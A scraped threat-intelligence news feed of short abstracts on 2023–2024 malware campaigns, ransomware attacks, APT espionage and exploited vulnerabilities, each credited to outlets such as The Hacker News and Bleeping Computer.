The STRRAT malware, sold for $80, allows attackers to take control of computers and steal data. Attackers use phishing emails pretending to be from government agencies to trick victims into downloading malicious files.BI.ZONE
August 6, 2024
North Korean Hackers Exploit VPN Update Flaw to Install Malware Full Text
Abstract
North Korean hackers exploited a VPN software update flaw to install malware and breach networks, as warned by South Korea's National Cyber Security Center. The threat groups involved in these activities are Kimsuky (APT43) and Andariel (APT45).Bleeping Computer
August 6, 2024
Ransomware Gang Targets IT Workers With New SharpRhino Malware Full Text
Abstract
The Hunters International ransomware group is using a new C# remote access trojan named SharpRhino to target IT workers and breach corporate networks. It is distributed through a typosquatting site posing as Angry IP Scanner's website.Bleeping Computer
August 5, 2024
Surge in Magniber Ransomware Attacks Impact Home Users Worldwide Full Text
Abstract
Unlike other ransomware groups targeting businesses, Magniber focuses on individuals. Victims report their devices getting infected after running software cracks. Ransom demands start at $1,000 and escalate to $5,000 if not paid within three days.Bleeping Computer
August 5, 2024
Linux Kernel Impacted by New SLUBStick Cross-Cache Attack Full Text
Abstract
A new Linux Kernel attack called SLUBStick has a 99% success rate in turning a limited heap vulnerability into a powerful memory read-and-write capability, allowing for privilege escalation and container escape.Bleeping Computer
August 3, 2024
Attacks on Bytecode Interpreters Conceal Malicious Injection Activity Full Text
Abstract
This type of attack, known as Bytecode Jiu-Jitsu, takes advantage of the fact that interpreters do not require execution privilege for bytecode, making it difficult for security tools to detect.Dark Reading
August 1, 2024
Ransomware Attack On Service Provider Hits 300 Small Banks Across India Full Text
Abstract
The attack targeted C-Edge Technologies, a provider of banking systems for these banks. As a precaution, the National Payment Corporation of India (NPCI) has isolated these banks from the broader payment network to contain the attack.Ndtv
July 31, 2024
Cybercriminals Target Polish Businesses with Agent Tesla and Formbook Malware Delivered by ModiLoader Full Text
Abstract
Cybercriminals targeted Polish businesses with Agent Tesla and Formbook malware through widespread phishing campaigns in May 2024. Small and medium-sized businesses (SMBs) in Poland, Italy, and Romania have been affected.We Live Security
July 30, 2024
SideWinder Utilizes New Infrastructure to Target Ports and Maritime Facilities in the Mediterranean Sea Full Text
Abstract
The recent attacks by the SideWinder APT group use phishing lures related to emotional topics like sexual harassment and salary cuts to trick victims into opening booby-trapped Microsoft Word documents.Blackberry
July 27, 2024
Unveiling the Latest Banking Trojan Threats in Latin America Full Text
Abstract
The malicious Chrome extension campaign in LATAM involves infecting victims through phishing websites and installing rogue extensions to steal sensitive information. The extensions mimic Google Drive, giving them access to a wide range of user data.Security Intelligence
July 26, 2024
Belarus-linked Hackers Target Ukrainian Organizations with PicassoLoader Malware Full Text
Abstract
GhostWriter, also known as UAC-0057, used PicassoLoader and Cobalt Strike Beacon to infect victims, including local government offices and groups associated with USAID’s Hoverla project.The Record
July 25, 2024
North Korean Hacker Group Targeting Healthcare, Energy Sectors Full Text
Abstract
North Korean hackers, specifically the Andariel hacking group, are now targeting the healthcare, energy, and financial sectors according to a Mandiant report. This group is believed to be associated with North Korea's Reconnaissance General Bureau.Bank Infosecurity
July 22, 2024
Attackers Abuse Swap File to Steal Credit Cards Full Text
Abstract
Attackers recently abused the swap file in a Magento e-commerce site to steal credit card information. Despite multiple cleanup attempts, the malware persisted until analysts discovered it.Sucuri
July 22, 2024
Fake CrowdStrike Fixes Target Companies With Malware, Data Wipers Full Text
Abstract
Malicious campaigns have emerged, including one targeting BBVA bank customers with a fake CrowdStrike Hotfix that installs remote access tools. Another attack involves a data wiper distributed under the guise of a CrowdStrike update.Bleeping Computer
July 20, 2024
OilAlpha Malicious Applications Target Humanitarian Aid Groups Operating in Yemen Full Text
Abstract
The attacks, linked to a group called OilAlpha, involved malicious mobile apps and targeted CARE International, Norwegian Refugee Council (NRC), and Saudi Arabian King Salman Humanitarian Aid and Relief Centre.Recorded Future
July 20, 2024
North Korean Hackers May Have Attacked Indian Crypto Exchange WazirX Full Text
Abstract
Indian crypto exchange WazirX disclosed a loss of virtual assets worth more than $230 million due to a cyber attack linked to North Korea. The attack targeted a multi-signature wallet with six signatories, leading to a breach in security measures.The Register
July 19, 2024
New Hacker Group Uses Open-Source Tools to Spy on Entities in Asia-Pacific Region Full Text
Abstract
Targets of TAG-100's attacks include intergovernmental and diplomatic entities in the Asia-Pacific region, religious organizations in the U.S. and Taiwan, as well as a political party supporting an investigation into the Chinese government.The Record
July 17, 2024
Hacktivist Groups Target Romania Amid Geopolitical Tensions Full Text
Abstract
Hacktivist groups are targeting Romania amidst geopolitical tensions, with increased DDoS attacks observed by security researchers. These attacks involve CyberDragon and the Cyber Army of Russia.Infosecurity Magazine
July 16, 2024
Void Banshee Targets Windows Users Through MSHTML Flaw to Spread Atlantida Stealer Full Text
Abstract
The vulnerability, CVE-2024-38112, was observed by Trend Micro in May 2024, being exploited as part of a multi-stage attack chain using internet shortcut files. The campaign has been active throughout 2024.Cyware
July 16, 2024
ShadowRoot Ransomware Targets Turkish Businesses Full Text
Abstract
The attackers target Turkish businesses with this ransomware campaign, distributing it via email addresses like Kurumsal[.]tasilat[@]internet[.]ru. The malware payload is hosted on a compromised GitHub account.Cyware
July 12, 2024
Japanese Space Agency Spots Unspecified Zero-Day Attacks Full Text
Abstract
JAXA was targeted with zero-day exploits during its investigation with Microsoft into a 2023 cyberattack. The attack mainly affected its Active Directory system, prompting JAXA to shut down networks to prevent data compromise.The Register
July 12, 2024
Japan Warns of Attacks Linked to North Korean Kimsuky Hackers Full Text
Abstract
The attacks were detected earlier this year, with indicators of compromise shared by AhnLab Security Intelligence Center. The attackers initiate their attacks with phishing emails containing malicious attachments disguised as documents.Bleeping Computer
August 31, 2023
Earth Estries Group Targets Government and IT Organizations Full Text
Abstract
A new cyberespionage campaign called Earth Estries has been discovered, targeting governments and organizations in the technology sector. Active since at least 2020, the campaign shows similarities with another APT group called FamousSparrow. It is essential for organizations to track and analyze t ... Read MoreCyware
August 31, 2023
VMConnect Supply Chain Attack Continues, Evidence Points to North Korea Full Text
Abstract
The recently discovered malicious Python packages, such as tablediter, request-plus, and requestspro, are believed to be a continuation of the VMConnect campaign attributed to North Korean threat actors.Cyware
August 31, 2023
Earth Estries’ Espionage Campaign Targets Governments and Tech Titans Across Continents Full Text
Abstract
A hacking outfit nicknamed Earth Estries has been attributed to a new, ongoing cyber espionage campaign targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. "The threat actors behind Earth Estries are working with high-level resources and functioning with sophisticated skills and experience in cyber espionage and illicit activities," Trend Micro researchers Ted Lee, Lenart Bermejo, Hara Hiroaki, Leon M Chang, and Gilbert Sison said . Active since at least 2020, Earth Estries is said to share tactical overlaps with another nation-state group tracked as FamousSparrow , which was first exposed by ESET in 2021 as exploiting ProxyLogon flaws in Microsoft Exchange Server to penetrate hospitality, government, engineering, and legal sectors. It's worth pointing out that commonalities have also been unearthed between FamousSparrow and UNC4841 , an uncategorized activity cluster held responsible forThe Hacker News
August 29, 2023
Chinese Hacking Group Exploits Barracuda Zero-Day to Target Government, Military, and Telecom Full Text
Abstract
A suspected Chinese-nexus hacking group exploited a recently disclosed zero-day flaw in Barracuda Networks Email Security Gateway (ESG) appliances to breach government, military, defense and aerospace, high-tech industry, and telecom sectors as part of a global espionage campaign. Mandiant, which is tracking the activity under the name UNC4841 , described the threat actor as "highly responsive to defensive efforts" and capable of actively tweaking their modus operandi to maintain persistent access to targets. "UNC4841 deployed new and novel malware designed to maintain presence at a small subset of high priority targets that it compromised either before the patch was released, or shortly following Barracuda's remediation guidance," the Google-owned threat intelligence firm said in a new technical report published today. Almost a third of the identified affected organizations are government agencies. Interestingly enough, some of the earliest compromisesThe Hacker News
August 28, 2023
Attacks on Citrix NetScaler systems linked to ransomware actor Full Text
Abstract
A threat actor believed to be tied to the FIN8 hacking group exploits the CVE-2023-3519 remote code execution flaw to compromise unpatched Citrix NetScaler systems in domain-wide attacks.BleepingComputer
August 28, 2023
Signs of Malware Attack Targeting Rust Developers Found on Crates.io Full Text
Abstract
The Rust Foundation was notified and it quickly removed the packages and locked the uploader’s account. GitHub was also notified and took action against the associated account.Cyware
August 27, 2023
Lazarus Exploits ManageEngine to Deploy QuiteRAT Full Text
Abstract
The Lazarus group was associated with a new campaign against healthcare entities in Europe and the U.S. In this campaign, the attackers exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to distribute the QuiteRAT malware. The malware has many capabilities similar to MagicRAT, anot ... Read MoreCyware
August 25, 2023
China-based ‘Flax Typhoon’ hackers targeting Taiwan govt: Microsoft Full Text
Abstract
The activities observed suggest the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.Cyware
August 24, 2023
Lazarus APT exploits Zoho ManageEngine flaw to target an Internet backbone infrastructure provider Full Text
Abstract
The North Korea-linked Lazarus group exploits a critical flaw in Zoho ManageEngine ServiceDesk Plus to deliver the QuiteRAT malware. The North Korea-linked APT group Lazarus has been exploiting a critical vulnerability, tracked as CVE-2022-47966,...Security Affairs
August 24, 2023
WinRAR Security Flaw Exploited in Zero-Day Attacks to Target Traders Full Text
Abstract
A recently patched security flaw in the popular WinRAR archiving software has been exploited as a zero-day since April 2023, new findings from Group-IB reveal. The vulnerability, cataloged as CVE-2023-38831 , allows threat actors to spoof file extensions, thereby making it possible to launch malicious scripts contained within an archive that masquerades as seemingly innocuous image or text files. It was addressed in version 6.23 released on August 2, 2023, alongside CVE-2023-40477. In attacks discovered by the Singapore-based firm in July 2023, specially crafted ZIP or RAR archive files distributed via trading-related forums such as Forex Station have been used to deliver a variety of malware families such as DarkMe, GuLoader , and Remcos RAT . "After infecting devices, the cybercriminals withdraw money from broker accounts," Group-IB malware analyst Andrey Polovinkin said , adding as many as 130 traders' devices have been compromised as part of the campaign. TThe Hacker News
August 24, 2023
More than 3,000 Openfire servers exposed to attacks using a new exploit Full Text
Abstract
The experts pointed out that the bug has been exploited for more than two months, but yet to be added to the CISA KEV catalog. The researchers discovered approximately 6,300 servers on Shodan and a bit more using the Censys search engine.Cyware
August 23, 2023
Ransomware Intrusion Impacts All Servers of Danish Cloud Provider Full Text
Abstract
The attack occurred on August 18, and since then, efforts have been made to restore the data, but it has proved difficult. CloudNordic has stated that it will not pay the ransom demanded by the hackers.Cyware
August 22, 2023
Carderbee Attacks: Hong Kong Organizations Targeted via Malicious Software Updates Full Text
Abstract
A previously undocumented threat cluster has been linked to a software supply chain attack targeting organizations primarily located in Hong Kong and other regions in Asia. The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under its insect-themed moniker Carderbee. The attacks, per the cybersecurity firm, leverage a trojanized version of a legitimate software called EsafeNet Cobra DocGuard Client to deliver a known backdoor called PlugX (aka Korplug) on victim networks. "In the course of this attack, the attackers used malware signed with a legitimate Microsoft certificate," the company said in a report shared with The Hacker News. The use of Cobra DocGuard Client to pull off a supply chain attack was previously highlighted by ESET in its quarterly Threat Report this year, detailing a September 2022 intrusion in which an unnamed gambling company in Hong Kong was compromised via a malicious update pushed by the software. The same companyThe Hacker News
August 22, 2023
A cyber attack hit the Australian software provider Energy One Full Text
Abstract
The Australian software provider Energy One announced it was hit by a cyberattack last week that affected certain corporate systems in Australia and the UK. The Australian software provider Energy One announced that a cyberattack hit certain corporate...Security Affairs
August 21, 2023
New HiatusRAT campaign targets Taiwan and U.S. military procurement system Full Text
Abstract
HiatusRAT malware operators resurfaced with a new wave of attacks targeting Taiwan-based organizations and a U.S. military procurement system. In March 2023, Lumen Black Lotus Labs researchers uncovered a sophisticated campaign called “HiatusRAT”...Security Affairs
August 19, 2023
Germany’s National Bar Association Investigating Ransomware Attack Full Text
Abstract
The German Federal Bar (BRAK) Association discovered the attack on August 2. The group is an umbrella organization overseeing 28 regional bars across Germany and representing about 166,000 lawyers nationally and internationally.Cyware
August 18, 2023
New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft Full Text
Abstract
A new "mass-spreading" social engineering campaign is targeting users of the Zimbra Collaboration email server with an aim to collect their login credentials for use in follow-on operations. The activity, active since April 2023 and still ongoing, targets a wide range of small and medium businesses and governmental entities, most of which are located in Poland, Ecuador, Mexico, Italy, and Russia. It has not been attributed to any known threat actor or group. "Initially, the target receives an email with a phishing page in the attached HTML file," ESET researcher Viktor Šperka said in a report. "The email warns the target about an email server update, account deactivation, or similar issue and directs the user to click on the attached file." The messages also spoof the from address to appear as if they are coming from a Zimbra administrator in a likely attempt to convince the recipients into opening the attachment. The HTML file contains a Zimbra loThe Hacker News
August 18, 2023
Cleveland City School District Suffers Ransomware Attack Full Text
Abstract
Cleveland City Schools say they are dealing with the aftermath of a ransomware attack Tuesday. They say less than 5% of faculty and staff devices were affected. A CCS spokesperson says their printers are down.Cyware
August 17, 2023
Stealthy LABRAT Operation Runs Cryptojacking and Proxyjacking Campaign Targeting GitLab Full Text
Abstract
The Sysdig Threat Research Team (TRT) recently discovered a new, financially motivated operation, dubbed LABRAT. This operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks.Cyware
August 17, 2023
China-Linked Bronze Starlight Group Targeting Gambling Sector with Cobalt Strike Beacons Full Text
Abstract
An ongoing cyber attack campaign originating from China is targeting the Southeast Asian gambling sector to deploy Cobalt Strike beacons on compromised systems. Cybersecurity firm SentinelOne said the tactics, techniques, and procedures point to the involvement of a threat actor tracked as Bronze Starlight (aka Emperor Dragonfly or Storm-0401), which has been linked to the use of short-lived ransomware families as a smokescreen to conceal its espionage motives. "The threat actors abuse Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons," security researchers Aleksandar Milenkoski and Tom Hegel said in an analysis published today. It also bears noting that the campaign exhibits overlaps with an intrusion set monitored by ESET under the name Operation ChattyGoblin . This activity, in turn, shares commonalities with a supply chain attack that came to light last year leveraging a trojaThe Hacker News
August 17, 2023
A massive campaign delivered a proxy server application to 400,000 Windows systems Full Text
Abstract
Researchers discovered a massive campaign that delivered a proxy server application to at least 400,000 Windows systems. AT&T Alien Labs researchers uncovered a massive campaign that delivered a proxy server application to at least 400,000 Windows...Security Affairs
August 17, 2023
New LABRAT Campaign Exploits GitLab Flaw for Cryptojacking and Proxyjacking Activities Full Text
Abstract
A new, financially motivated operation dubbed LABRAT has been observed weaponizing a now-patched critical flaw in GitLab as part of a cryptojacking and proxyjacking campaign. "The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command-and-control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence," Sysdig said in a report shared with The Hacker News. "Furthermore, the attacker abused a legitimate service, TryCloudflare , to obfuscate their C2 network." Proxyjacking allows the attacker to rent the compromised host out to a proxy network, making it possible to monetize the unused bandwidth. Cryptojacking, on the other hand, refers to the abuse of the system resources to mine cryptocurrency. A notable aspect of the campaign is the use of compiled binaries written in Go and .NET to fly under the radar, with LABRAT also providing backdoor access to the infected systems.The Hacker News
August 14, 2023
Ongoing Xurum attacks target Magento 2 e-stores Full Text
Abstract
Experts warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites using Adobe's Magento 2 CMS. Akamai researchers warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites running the Magento 2 CMS. The attackers are actively...Security Affairs
August 14, 2023
Charming Kitten Targets Iranian Dissidents with Advanced Cyber Attacks Full Text
Abstract
Germany's Federal Office for the Protection of the Constitution (BfV) has warned of cyber attacks targeting Iranian persons and organizations in the country since the end of 2022. "The cyber attacks were mainly directed against dissident organizations and individuals – such as lawyers, journalists, or human rights activists – inside and outside Iran," the agency said in an advisory. The intrusions have been attributed to a threat actor called Charming Kitten , which is also tracked under the names APT35, Mint Sandstorm, TA453 and Yellow Garuda. While Iranian nation-state actors lag behind their Russian and Chinese counterparts in sophistication, they have demonstrated a continued advancement of tools and techniques, adding an arsenal of custom malware to facilitate information gathering and rapidly exploiting n-day security flaws to obtain initial access. Charming Kitten, in particular, has a long, storied history of leveraging elaborate social engineering andThe Hacker News
August 12, 2023
Power Generator in South Africa hit with DroxiDat and Cobalt Strike Full Text
Abstract
Threat actors employed a new variant of the SystemBC malware, named DroxiDat, in attacks aimed at African critical infrastructure. Researchers from Kaspersky's Global Research and Analysis Team (GReAT) reported that an unknown threat actor used a new variant...Security Affairs
August 11, 2023
Researchers Uncover Years-Long Cyber Espionage on Foreign Embassies in Belarus Full Text
Abstract
A hitherto undocumented threat actor operating for nearly a decade and codenamed MoustachedBouncer has been attributed to cyber espionage attacks aimed at foreign embassies in Belarus. "Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets," ESET security researcher Matthieu Faou said , describing the group as skilled and advanced. The adversary, active since at least 2014, is assessed to be aligned with Belarusian interests, likely employing a lawful interception system such as SORM to conduct its AitM attacks as well as deploy disparate tools called NightClub and Disco. Both the Windows malware frameworks support additional spying plugins including a screenshotter, an audio recorder, and a file stealer. The oldest sample of NightClub dates back to November 19, 2014, when it was uploaded to VirusTotal from Ukraine. Embassy staff from four differThe Hacker News
August 11, 2023
Charming Kitten Hackers Target Iranian Dissidents in Germany Full Text
Abstract
The Federal Office for the Protection of the Constitution (BfV) reported it had found concrete attempts by the group known as Charming Kitten to target the Iranian opposition and exiles based in Germany.Cyware
August 11, 2023
New SystemBC Malware Variant Targets Southern African Power Company Full Text
Abstract
An unknown threat actor has been linked to a cyber attack on a power generation company in southern Africa with a new variant of the SystemBC malware called DroxiDat as a precursor to a suspected ransomware attack. "The proxy-capable backdoor was deployed alongside Cobalt Strike Beacons in a south African nation's critical infrastructure," Kurt Baumgartner, principal security researcher at Kaspersky's Global Research and Analysis Team (GReAT), said . The Russian cybersecurity company said the attack, which took place in late March 2023, was in its early stages and involved the use of DroxiDat to profile the system and proxy network traffic using the SOCKS5 protocol to and from command-and-control (C2) infrastructure. SystemBC is a C/C++-based commodity malware and remote administrative tool that was first seen in 2019 . Its main feature is to set up SOCKS5 proxies on victim computers that can then be used by threat actors to tunnel malicious traffic associThe Hacker News
August 10, 2023
New Attack Alert: Freeze[.]rs Injector Weaponized for XWorm Malware Attacks Full Text
Abstract
Malicious actors are using a legitimate Rust-based injector called Freeze[.]rs to deploy a commodity malware called XWorm in victim environments. The novel attack chain, detected by Fortinet FortiGuard Labs on July 13, 2023, is initiated via a phishing email containing a booby-trapped PDF file. It has also been used to introduce Remcos RAT by means of a crypter called SYK Crypter, which was first documented by Morphisec in May 2022. "This file redirects to an HTML file and utilizes the 'search-ms' protocol to access an LNK file on a remote server," security researcher Cara Lin said . "Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions." Freeze[.]rs, released on May 4, 2023, is a open-source red teaming tool from Optiv that functions as a payload creation tool used for circumventing security solutions and executing shellcode in a stealthy manner. "Freeze[.]rs utilizes multiple tecThe Hacker News
August 10, 2023
Pro-Russian Hacker Group Claims Attacks on French, Dutch Websites Full Text
Abstract
The latest attacks come a week after the group, NoName057(16), hit Spanish and Italian government and private sector organizations with distributed denial-of-service (DDoS) attacks.Cyware
August 09, 2023
China-Linked Hackers Strike Worldwide: 17 Nations Hit in 3-Year Cyber Campaign Full Text
Abstract
Hackers associated with China's Ministry of State Security (MSS) have been linked to attacks in 17 different countries in Asia, Europe, and North America from 2021 to 2023. Cybersecurity firm Recorded Future attributed the intrusion set to a nation-state group it tracks under the name RedHotel (previously Threat Activity Group-22 or TAG-22), which overlaps with a cluster of activity broadly monitored as Aquatic Panda , Bronze University , Charcoal Typhoon, Earth Lusca , and Red Scylla (or Red Dev 10). Active since 2019, some of the prominent sectors targeted by the prolific actor encompass academia, aerospace, government, media, telecommunications, and research. A majority of the victims during the period were government organizations. "RedHotel has a dual mission of intelligence gathering and economic espionage," the cybersecurity company said , calling out its persistence, operational intensity, and global reach. "It targets both government entities forThe Hacker News
August 9, 2023
Big Cyberespionage Attack Against Japan Attributed to China Full Text
Abstract
Classified military networks run by Japan reportedly suffered a massive breach in 2020 at the hands of a Chinese cyberespionage group that proved tough to eject even after being discovered.Cyware
August 8, 2023
Ukrainian State Agencies Targeted with Open-Source Malware MerlinAgent Full Text
Abstract
In early August, an unidentified threat actor tracked as UAC-0154 sent malicious emails to its targets, purportedly containing security tips from Ukraine's computer emergency response team (CERT-UA).Cyware
August 07, 2023
North Korean Hackers Targets Russian Missile Engineering Firm Full Text
Abstract
Two different North Korean nation-state actors have been linked to a cyber intrusion against the major Russian missile engineering company NPO Mashinostroyeniya. Cybersecurity firm SentinelOne said it identified "two instances of North Korea related compromise of sensitive internal IT infrastructure," including a case of an email server compromise and the deployment of a Windows backdoor dubbed OpenCarrot. The breach of the Linux email server has been attributed to ScarCruft . OpenCarrot, on the other hand, is a known implant previously identified as used by the Lazarus Group. The attacks were flagged in mid-May 2022. A rocket design bureau based in Reutov, NPO Mashinostroyeniya was sanctioned by the U.S. Treasury Department in July 2014 in connection to "Russia's continued attempts to destabilize eastern Ukraine and its ongoing occupation of Crimea." While both ScarCruft (aka APT37) and the Lazarus Group are affiliated to North Korea, it's wThe Hacker News
August 5, 2023
Reptile Rootkit employed in attacks against Linux systems in South Korea Full Text
Abstract
Researchers observed threat actors that are using an open-source rootkit called Reptile in attacks aimed at systems in South Korea. Reptile is an open-source kernel module rootkit that was designed to target Linux systems, unlike other rootkits,...Security Affairs
August 4, 2023
Attackers use dynamic code loading to bypass Google Play store’s malware detections Full Text
Abstract
Threat actors rely on the 'versioning' technique to evade malware detections of malicious code uploaded to the Google Play Store. Google Cybersecurity Action Team (GCAT) revealed that threat actors are using a technique called versioning to evade...Security Affairs
August 03, 2023
Hundreds of Citrix NetScaler ADC and Gateway Servers Hacked in Major Cyber Attack Full Text
Abstract
Hundreds of Citrix NetScaler ADC and Gateway servers have been breached by malicious actors to deploy web shells, according to the Shadowserver Foundation. The non-profit said the attacks take advantage of CVE-2023-3519 , a critical code injection vulnerability that could lead to unauthenticated remote code execution. The flaw, patched by Citrix last month, carries a CVSS score of 9.8. The largest number of impacted IP addresses are based in Germany, followed by France, Switzerland, Italy, Sweden, Spain, Japan, China, Austria, and Brazil. The exploitation of CVE-2023-3519 to deploy web shells was previously disclosed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which said the attack was directed against an unnamed critical infrastructure organization in June 2023. The disclosure comes as GreyNoise said it detected three IP addresses attempting to exploit CVE-2023-24489 (CVSS score: 9.1), another critical flaw in Citrix ShareFile software thatThe Hacker News
August 3, 2023
Russian Hacker Group NoName057(16) Claim Attacks on Italian Banks, Government Agencies Full Text
Abstract
A pro-Russian hacking group has claimed responsibility for cyberattacks on Italian banks, businesses, and government agencies which flooded networks and disrupted services.Cyware
August 01, 2023
European Bank Customers Targeted in SpyNote Android Trojan Campaign Full Text
Abstract
Various European customers of different banks are being targeted by an Android banking trojan called SpyNote as part of an aggressive campaign detected in June and July 2023. "The spyware is distributed through email phishing or smishing campaigns and the fraudulent activities are executed with a combination of remote access trojan (RAT) capabilities and vishing attack," Italian cybersecurity firm Cleafy said in a technical analysis released Monday. SpyNote , also called SpyMax, is similar to other Android banking Trojans in that it requires Android's accessibility permissions in order to grant itself other necessary permissions and gather sensitive data from infected devices. What makes the malware strain notable is its dual functions as spyware and perform bank fraud. The attack chains commence with a bogus SMS message urging users to install a banking app by clicking on the accompanying link, redirecting the victim to the legitimate TeamViewer QuickSupport aThe Hacker News
August 1, 2023
Meow Campaign Reaches Misconfigured Jupyter Notebook Instances Full Text
Abstract
The "Meow" campaign, targeting unsecured databases, has resurfaced, with the threat actor using misconfigured Jupyter Notebook instances to gather information and delete databases.Cyware
July 31, 2023
Patchwork Hackers Target Chinese Research Organizations Using EyeShell Backdoor Full Text
Abstract
Threat actors associated with the hacking crew known as Patchwork have been spotted targeting universities and research organizations in China as part of a recently observed campaign. The activity, according to KnownSec 404 Team , entailed the use of a backdoor codenamed EyeShell . Patchwork , also known by the names Operation Hangover and Zinc Emerson, is suspected to be a threat group that operates on behalf of India. Active since at least December 2015, attack chains mounted by the outfit have a narrow focus and tend to single out Pakistan and China with custom implants such as BADNEWS via spear-phishing and watering hole attacks. The adversarial collective has been found to share tactical overlaps with other cyber-espionage groups with an Indian connection, including SideWinder and the DoNot Team . Earlier this May, Meta disclosed that it took down 50 accounts on Facebook and Instagram operated by Patchwork, which took advantage of rogue messaging apps uploaded to theThe Hacker News
July 28, 2023
Hackers Abusing Windows Search Feature to Install Remote Access Trojans Full Text
Abstract
A legitimate Windows search feature is being exploited by malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The novel attack technique, per Trellix, takes advantage of the " search-ms: " URI protocol handler, which offers the ability for applications and HTML links to launch custom local searches on a device, and the " search: " application protocol, a mechanism for calling the desktop search application on Windows. "Attackers are directing users to websites that exploit the 'search-ms' functionality using JavaScript hosted on the page," security researchers Mathanraj Thangaraju and Sijo Jacob said in a Thursday write-up. "This technique has even been extended to HTML attachments, expanding the attack surface." In such attacks, threat actors have been observed creating deceptive emails that embed hyperlinks or HTML attachmeThe Hacker News
July 28, 2023
BlueBravo Deploys GraphicalProton Backdoor Against European Diplomatic Entities Full Text
Abstract
The Russian nation-state actor known as BlueBravo has been observed targeting diplomatic entities throughout Eastern Europe with the goal of delivering a new backdoor called GraphicalProton, exemplifying the continuous evolution of the threat. The phishing campaign is characterized by the use of legitimate internet services (LIS) for command-and-control (C2) obfuscation, Recorded Future said in a new report published Thursday. The activity was observed between March and May 2023. BlueBravo , also known by the names APT29, Cloaked Ursa, and Midnight Blizzard (formerly Nobelium), is attributed to Russia's Foreign Intelligence Service (SVR), and has in the past used Dropbox, Firebase, Google Drive, Notion, and Trello to evade detection and stealthily establish communications with infected hosts. To that end, GraphicalProton is the latest addition to a long list of malware targeting diplomatic organizations after GraphicalNeutrino (aka SNOWYAMBER), HALFRIG, and QUARTERRIG .The Hacker News
July 27, 2023
Hackers Target Apache Tomcat Servers for Mirai Botnet and Crypto Mining Full Text
Abstract
Misconfigured and poorly secured Apache Tomcat servers are being targeted as part of a new campaign designed to deliver the Mirai botnet malware and cryptocurrency miners. The findings come courtesy of Aqua, which detected more than 800 attacks against its Tomcat server honeypots over a two-year time period, with 96% of the attacks linked to the Mirai botnet. Of these attack attempts, 20% (or 152) entailed the use of a web shell script dubbed "neww" that originated from 24 unique IP addresses, with 68% of them originating from a single IP address (104.248.157[.]218). "The threat actor scanned for Tomcat servers and launched a brute force attack against it, attempting to gain access to the Tomcat web application manager by trying different combinations of credentials associated with it," Aqua security researcher Nitzan Yaakov said . Upon gaining a successful foothold, the threat actors have been observed deploying a WAR file that contains a malicious web sThe Hacker News
July 25, 2023
Twelve Norwegian ministries were hacked using a zero-day vulnerability Full Text
Abstract
Threat actors exploited a zero-day flaw in third-party software in attacks against the ICT platform used by 12 Norwegian ministries. The ICT platform used by twelve ministries of the Norwegian government was hacked, and threat actors have exploited...Security Affairs
July 24, 2023
Norwegian Government Security and Service Organisation Hit by Cyberattack Full Text
Abstract
Twelve Norwegian government ministries have been hit by a cyberattack, the Norwegian government said on Monday, the latest attack to hit the public sector of Europe's largest gas supplier and NATO's northernmost member.Cyware
July 24, 2023
Banking Sector Targeted in Open-Source Software Supply Chain Attacks Full Text
Abstract
Cybersecurity researchers said they have discovered what they say is the first open-source software supply chain attacks specifically targeting the banking sector. "These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it," Checkmarx said in a report published last week. "The attackers employed deceptive tactics such as creating a fake LinkedIn profile to appear credible and customized command-and-control (C2) centers for each target, exploiting legitimate services for illicit activities." The npm packages have since been reported and taken down. The names of the packages were not disclosed. In the first attack, the malware author is said to have uploaded a couple of packages to the npm registry in early April 2023 by posing as an employee of the target bank. The modules came with a preinstall script to activate the infection sequence. To complete the rusThe Hacker News
July 24, 2023
First Known Targeted OSS Supply Chain Attacks Against the Banking Sector Full Text
Abstract
The attackers employed deceptive tactics such as creating fake LinkedIn profiles to appear credible and using customized command and control (C2) centers for each target, exploiting legitimate services for illicit activities.Cyware
July 21, 2023
Azure AD Token Forging Technique in Microsoft Attack Extends Beyond Outlook, Wiz Reports Full Text
Abstract
The recent attack against Microsoft's email infrastructure by a Chinese nation-state actor referred to as Storm-0558 is said to have a broader scope than previously thought. According to cloud security company Wiz, the inactive Microsoft account (MSA) consumer signing key used to forge Azure Active Directory (Azure AD or AAD) tokens to gain illicit access to Outlook Web Access (OWA) and Outlook.com could also have allowed the adversary to forge access tokens for various types of Azure AD applications. This includes every application that supports personal account authentication, such as OneDrive, SharePoint, and Teams; customers applications that support the "Login with Microsoft functionality," and multi-tenant applications in certain conditions. "Everything in the world of Microsoft leverages Azure Active Directory auth tokens for access," Ami Luttwak, chief technology officer and co-founder of Wiz, said in a statement. "An attacker with an AAD siThe Hacker News
July 21, 2023
Experts believe North Korea behind JumpCloud supply chain attack Full Text
Abstract
SentinelOne researchers attribute the recent supply chain attacks on JumpCloud to North Korea-linked threat actors. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless and secure...Security Affairs
July 21, 2023
Android SpyNote Attacks Electric and Water Public Utility Users in Japan Full Text
Abstract
A smishing campaign is targeting Japanese Android users by posing as a power and water infrastructure company and luring victims to a phishing website to download the SpyNote malware.Cyware
July 20, 2023
ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder Full Text
Abstract
The American cosmetics giant company Estée Lauder was hacked by two distinct ransomware groups, the ALPHV/BlackCat and Clop gangs. Yesterday the cybersecurity expert @sonoclaudio first alerted me about a strange circumstance, two ransomware actors,...Security Affairs
July 20, 2023
North Korean State-Sponsored Hackers Suspected in JumpCloud Supply Chain Attack Full Text
Abstract
